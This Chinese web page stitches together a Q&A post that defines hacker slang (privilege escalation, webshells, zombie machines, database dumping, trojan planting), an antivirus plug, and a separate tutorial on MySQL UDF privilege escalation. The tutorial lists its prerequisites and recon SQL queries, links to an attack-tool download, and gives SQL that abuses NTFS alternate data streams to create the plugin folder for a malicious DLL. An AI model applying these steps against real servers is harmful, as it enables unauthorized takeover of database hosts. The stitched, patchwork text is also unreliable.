黑客专业名词“提权”，“WEBSHELL”“肉鸡”“暴库”“挂马”这几个词语是啥意思啊？

Posted 2023-05-13

百度百科提供
提高自己在服务器中的权限，主要针对网站入侵过程中，当入侵某一网站时，通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。
肉鸡也称傀儡机，是指可以被黑客远程控制的机器。比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马，黑客可以随意操纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统，如windows、linux、unix等，更可以是一家公司、企业、学校甚至是政府军队的服务器。
暴库，就是通过一些技术手段或者程序漏洞得到数据库的地址，并将数据非法下载到本地。黑客非常乐意于这种工作，为什么呢？因为黑客在得到网站数据库后，就能得到网站管理账号，对网站进行破坏与管理，黑客也能通过数据库得到网站用户的隐私信息，甚至得到服务器的最高权限。
所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。 参考技术A 你上黑客查一下！ 参考技术B 病毒没什么大不了
可以去腾讯智慧安全申请个腾讯御点
然后使用左侧的病毒查杀功能，给电脑来杀毒就可以了哦

MySQL提权之udf提权(无webshell的情况)

0x00 介绍

本篇我们来讲无webshell时利用udf进行提权

0x01 前提

1. 必须是root权限（主要是得创建和抛弃自定义函数）

2. secure_file_priv=(未写路径)

3. 将udf.dll文件上传到MySQL的plugin目录下（这里以MySQL>=5.1为例）

0x02 提权中用到的查询语句

 

1 SELECT version(); #查询数据库版本
2  
3 SELECT @@basedir; #查询MySQL的安装目录
4  
5 SELECT user();  #查询当前用户
6  
7 SHOW VARIABLES LIKE \'%plugins%\';  #查找是否有plugins目录
8  
9 show variables like \'%compile%\'; #查看数据库位数

 

 

 

0x03 工具

暗月工具

下载地址：https://pan.baidu.com/s/1EoGKX6bksOCFGgonFvfgYw 提取码：8ng0
个人感觉这个工具依然需要在plugin文件夹存在的前提下
打开工具页面如下：

 

 

 

 接下来直接执行命令即可

 

 

 这工具真的是太香了

ps: 

这里补充一点，

这里的关键是lib目录下没有plugin文件夹，得突破限制创建文件夹
还有一种创建plugin文件夹的方式（我没成功过，有缘的小伙伴可能会成功）
一般Lib、Plugin文件夹需要手工建立（可用NTFS ADS流模式突破进而创建文件夹）

select @@basedir; //查找到mysql的目录

select \'It is dll\' into dumpfile \'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.1\\\\lib::$INDEX_ALLOCATION\'; //利用NTFS ADS创建lib目录

select \'It is dll\' into dumpfile \'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.1\\\\lib\\\\plugin::$INDEX_ALLOCATION\'; //利用NTFS ADS创建plugin目录